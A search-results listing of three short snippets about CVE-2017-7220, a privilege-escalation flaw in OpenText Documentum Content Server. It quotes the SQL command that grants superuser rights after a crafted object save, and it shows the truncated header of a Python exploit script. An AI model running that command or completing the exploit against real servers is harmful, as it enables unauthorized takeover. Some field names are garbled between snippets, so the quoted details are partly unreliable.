3 matches found
CVE-2017-7220
OpenText Documentum Content Server has a vulnerability where an attacker can gain superuser access by saving a crafted object via sys_obj_save (or saving an object) and issuing an unauthorized UPDATE dm_dbo.dm_user_s SET user_privileges=16, i.e., the so‑called RPC save-commands attack. This CVE (...
CVE-2017-7220
OpenText Documentum Content Server allows superuser access via sysobjsave or save of a crafted object, followed by an unauthorized "UPDATE dmdbo.dmusers SET userprivileges=16" command, aka an "RPC save-commands" attack. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-453...
OpenText Documentum Content Server Privilege Evaluation
CVE-2017-7220-01.py: !/usr/bin/env python import socket import sys from os.path import basename from dctmpy.docbaseclient import DocbaseClient from dctmpy.obj.typedobject import TypedObject CIPHERS = "ALL:aNULL:!eNULL" def usage: print "usage:\n\t%s host port user password" % basenamesys.argv0 de...